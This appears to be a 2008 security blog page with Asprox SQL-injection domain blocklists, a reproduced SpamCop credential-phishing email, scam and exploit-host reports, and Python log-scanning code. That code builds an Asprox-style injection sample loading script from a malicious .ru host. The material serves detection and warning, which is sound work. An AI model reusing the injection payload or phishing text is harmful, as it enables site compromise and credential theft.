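1224144001.456     98 10.1.2.33 TCP_MISS/200 2210 GET http://lang42.ru/x.js - DIRECT/198.51.100.7 application/x-javascript
1224144002.789    121 10.1.2.57 TCP_MISS/200 4021 GET http://cdn.errghr.ru:8080/js/a.js?id=1 - DIRECT/198.51.100.8 application/x-javascript
1224144003.012     44 10.1.2.90 TCP_MISS/200  900 GET http://notlang42.ru/ - DIRECT/198.51.100.9 text/html
"""


def host_of(url: str) -> str:
    """Hostname part of a URL, lower-cased, port stripped."""
    return (urlsplit(url).hostname or "").lower()


def is_blocked(host: str, blocklist=ASPROX_DOMAINS) -> bool:
    """True if host is a listed domain or any sub-domain of one."""
    parts = host.split(".")
    return any(".".join(parts[i:]) in blocklist for i in range(len(parts) - 1))


def parse_squid_line(line: str):
    """Return (timestamp, client, url) from a native Squid log line, else None."""
    fields = line.split()
    if len(fields) < 7:
        return None
    return fields[0], fields[2], fields[6]


def find_hits(log_text: str, blocklist=ASPROX_DOMAINS) -> list:
    """Return [(timestamp, client, host, url)] for every request to a listed domain."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_squid_line(line)
        if parsed is None:
            continue
        ts, client, url = parsed
        host = host_of(url)
        if is_blocked(host, blocklist):
            hits.append((ts, client, host, url))
    return hits


if __name__ == "__main__":
    for ts, client, host, url in find_hits(SAMPLE_LOG):
        print(f"{ts} {client} -> {host}  ({url})")
```

A client that shows up here has already fetched the injected script; the useful follow-up is to pull that machine's full log for the same session to see which of your own (SQL-injected) pages sent it there.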

Saturday, 13 September 2008

Doug Stanhope

I first stumbled across US stand-up comic Doug Stanhope [link probably NSFW] some years ago and was in equal parts horrified and amused by his work. By chance, I found out that he was in the UK (at the Leicester Square Theatre) so Mrs Dynamoo and myself booked some tickets to go and see him live.

You have to understand that Stanhope is pretty much the definition of "edgy". He seems to have no taboos and no fear.. as long as he's had some beer. Understand that some of his topics include suicide, gynaecology, death, drug abuse, overpopulation, abortion and Sarah Palin. Sometimes combined (don't click if you are offended by.. well, offensive stuff).

Even people who aren't easily offended are likely to be offended by something he will say. But on the other hand, perhaps some of those observations on the human condition are more profound than you would think.

So, Stanhope was on form and really, really funny. And yes.. there were several times when I thought "no.. he can't be saying that!". I could go into details, but if you like this kind of thing then it would spoil the surprise... I think it's the first time I've ever had to watch a gig like this from between my fingers.

Anyway, Stanhope is in London and Manchester for most of September, and then back in the US doing a tour for October and November (itinerary here). Or you could purvey yourself one of his fine DVDs on Amazon.

Thursday, 11 September 2008

Dating scams

Dating scams are usually a variant of the advance fee fraud: some pretty girl (probably some ugly bloke in reality) sends you some random photos and explains that they want to move to your country and move in with you.. but can they have some money first? The basic operation of these scams is described here. To make it look more credible, sometimes fake dating sites are set up to give the whole thing an air of legitimacy.

This current batch of fake sites is being advertised with an email similar to the following:

i need you

i am Nice Girl good looking girl who is looking to chat with you.
e-mail me back at UcWkS@lam2you.com

i will reply back with some really nice pictures.

The domain lam2you.com has a corresponding web site on 79.135.167.51 calling itself "Online sexiest dating site". As it happens, there are a whole bunch of other domains on the same server, also describing themselves as "Online sexiest dating site", all best avoided.

One thing of note is that the name servers used here are ns1.droreal.com and ns2.droreal.com; droreal.com appears to be a domain used to support other dating scam sites.

Asprox: 22net.ru, 4net9.ru, 64asp.ru, 92prt.ru and fst9.ru

These are the domains active in the Asprox SQL Injection attack in the past 24 hours; new ones are in bold. Block these and/or check your logs for them.

  • 22net.ru
  • 4net9.ru
  • 51com.ru
  • 64asp.ru
  • 92prt.ru
  • acr34.ru
  • fst9.ru
  • sel92.ru

Wednesday, 10 September 2008

SpamCop phish

Some people will phish for anything - in this case they are trying to get access to SpamCop accounts. Go figure. The reply-to address is 2020sarah@live.com.

Subject: UPDATE YOUR ACCOUNT / SPAMCOP.NET
From: "Admin@spamcop.net"
Date: Wed, September 10, 2008 4:54 pm
Cc: recipient list not shown:;
Priority: Normal

This is a WebNews Email Account Update
Please see the bottom of this mailing on this information.
-----------------------------------------------------------
SPAMCOP.NET WEBMAIL
INTERNET SERVICE WEBSITE WISH TO INFORM YOU THAT WE HAVE
SOME PROBLEMS ABOUT EACH CUSTOMER ACCOUNT EMAIL. DUE TO
ERROR CODE 334409.

WE DISCOVERD THAT IN FEW DAYS FROM NOW EACH CUSTOMER WILL
NOT BE ABLE TO ACCESS HIS OR HER EMAIL ACCOUNT. IN THAT
REGARD,YOU ARE REQUIRED TO SEND YOUR EMAIL ADDRESS AND
PASSWORD FOR A NEW ACCOUNT UPDATE.

YOU ARE ADVISED TO IMMEDIATELY SEND US THE REQUIRED
INFORMATION SO AS TO ENABLE US IMMEDIATELY UPDATE YOUR
ACCOUNT.

Note:You have to understand that the reason why we are not
sending this message from our own private account.This is
due to some technical problem we are having right now.

BELOW THE INFORMATION RQRUIRED FOR ACCOUT UPDATE

1)Full Email Address:
2)password:
3)date of birth:

Thanks for your understanding.

SPAMCOP.NET WEBMAIL INTERNET SERVICE


PestPatrol: SillyDl FFL in wuauclt.exe

It looks like CA PestPatrol might have a false positive, detecting SillyDl FFL in C:\windows\system32\wuauclt.exe. This is a component of Windows Update, and in the case of the false positive it is a 124,184 byte file with an internal version number of 5.8.0.2469.

PestPatrol does not appear to be trying to delete the file, it is merely blocking access to it. Updating your Windows Update components should clear the problem. CA usually fix these false positives in a day or so.

The current signature version is 2008.9.9.15. Note that the PestPatrol engine is used in some other products, not all of which have the CA name on them.

Asprox: net83.ru, acr34.ru, asl39.ru and net83.ru

Another bunch of very fresh Asprox domains being used in the Asprox SQL Injection attack, registered at Naunet to email address retyi111@yahoo.com. Check your logs or block access to these sites.

  • 51com.ru
  • acr34.ru
  • asl39.ru
  • net83.ru

Tuesday, 9 September 2008

SQL Injection: ave2.cn / %61%76%65%32%2E%63%6E

This SQL Injection attack seems to be aimed at Chinese language sites. The code injected points to http://%61%76%65%32%2E%63%6E, which is simply percent-encoded (URL-encoded) and decodes to ave2.cn, hosted on 219.129.239.251.

ave2.cn then calls asp-18.cn, asp-12.cn and www.hxg006.cn (all hosted on 219.129.239.251).

Between them, these sites carry a VERY wide variety of exploits, including MS06-014, GLIEDown (for the Baofeng Storm StormPlayer), MS snpvw.Snapshot viewer (Outlook Express), DPClient.Vod (Xunlei Thunder DapPlayer), Flash Player and RealPlayer. There are possibly other exploits mixed in, so I would regard ave2.cn as being VERY dangerous.
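The log check the Asprox posts above recommend and the percent-decoding of the ave2.cn reference, combined into one added Python example (not the blog's own code): it decodes request lines, matches every referenced host against a blocklist built from the domains named in these posts, and scans a few constructed log lines. The hex-literal CAST() form of the Asprox payload handled by expand_hex is assumed from outside this page, and the sample log lines are constructed, not real traffic.

```python
import re
from urllib.parse import unquote

# Constructed blocklist drawn from the domains named in these posts.
BLOCKLIST = {"ave2.cn", "asp-18.cn", "asp-12.cn", "hxg006.cn", "22net.ru",
             "4net9.ru", "51com.ru", "64asp.ru", "92prt.ru", "acr34.ru",
             "fst9.ru", "sel92.ru", "net83.ru", "asl39.ru", "64do.com"}
# Host of an http(s) URL; '%' is allowed so http://%61%76%65%32%2E%63%6E is caught.
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-%]+)")
# Long hex literals, e.g. the CAST(0x... AS VARCHAR) form of Asprox payloads (assumed).
HEX_RUN_RE = re.compile(r"0x([0-9A-Fa-f]{8,})")

def expand_hex(text):
    """Replace 0x<hex> runs with their ASCII decoding; leave undecodable runs alone."""
    def repl(m):
        try:
            return bytes.fromhex(m.group(1)).decode("ascii")
        except ValueError:  # odd length or non-ASCII bytes
            return m.group(0)
    return HEX_RUN_RE.sub(repl, text)

def blocked_hosts(text, blocklist=BLOCKLIST):
    """Return blocklisted domains referenced by URLs in text; subdomains count."""
    hits = set()
    for raw in URL_HOST_RE.findall(text):
        # Decode the host itself too, in case only the host was encoded.
        parts = unquote(raw).lower().rstrip(".").split(".")
        for i in range(len(parts) - 1):
            if ".".join(parts[i:]) in blocklist:
                hits.add(".".join(parts[i:]))
                break
    return hits

def scan_log(lines, blocklist=BLOCKLIST):
    """Yield (line number, hits) for each decoded log line naming a blocklisted host."""
    for n, line in enumerate(lines, 1):
        # Percent-decode the request first, then expand any hex payload inside it.
        hits = blocked_hosts(expand_hex(unquote(line)), blocklist)
        if hits:
            yield n, hits

# Constructed sample access-log lines (not real traffic); line 2 mimics an
# Asprox-style injection whose hex payload decodes to a <script> tag.
_PAYLOAD = "0x" + "<script src=http://92prt.ru/x.js>".encode().hex().upper()
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Sep/2008:10:01:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.6 - - [09/Sep/2008:10:02:11 +0000] "GET /page.asp?id=1;SET%20@S=CAST('
    + _PAYLOAD + '%20AS%20VARCHAR(4000));EXEC(@S) HTTP/1.1" 200 512',
    '10.0.0.7 - - [09/Sep/2008:10:03:45 +0000] "GET /a.php?u=http://%61%76%65%32%2E%63%6E/1.htm HTTP/1.1" 200 99',
]
```

Running `dict(scan_log(SAMPLE_LOG))` flags line 2 for 92prt.ru and line 3 for ave2.cn, while the clean first line is not reported.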

Robtex reports the following domains on 219.129.239.251, all of which are probably worth avoiding:

  • hs7yue.cn
  • hxg008.cn
  • jzm015.cn
  • doups.cn
  • jzm013.cn
  • jzm014.cn
  • qingfeng01.cn

Monday, 8 September 2008

Asprox: 64do.com

Possibly the final Asprox domain of the day: 64do.com. Add this to your block or scan list.

Asprox: "aspx" domains

Keep an eye out for these following Asprox domains, all recently registered to the email address druid00091@aol.com. Block them or scan your logs for them.

  • 24aspx.com
  • 2aspx.net
  • 6aspx.com
  • 9aspx.net
  • aspx46.com
These domains follow the same pattern as this one and this one.

Asprox: 19ssl.net

Another "druid00091@aol.com" domain (following on from this one and this one), this time 19ssl.net, which is being actively used as part of the SQL injection attacks. The top level of this domain also hosts a copy of the (presumably legitimate) nescodirect.com site (this behaviour is noted elsewhere).

Domain name: 19ssl.net

Registrant Contact:
City22 llc
Alex Williamos druid00091@aol.com
+1.8827721124 fax: +1.8827721124
321113 po box
New York NY 12131
us

Administrative Contact:
Alex Williamos druid00091@aol.com
+1.8827721124 fax: +1.8827721124
321113 po box
New York NY 12131
us

Technical Contact:
Alex Williamos druid00091@aol.com
+1.8827721124 fax: +1.8827721124
321113 po box
New York NY 12131
us

Billing Contact:
Alex Williamos druid00091@aol.com
+1.8827721124 fax: +1.8827721124
321113 po box
New York NY 12131
us

DNS:
ns1.19ssl.net
ns2.19ssl.net
ns3.19ssl.net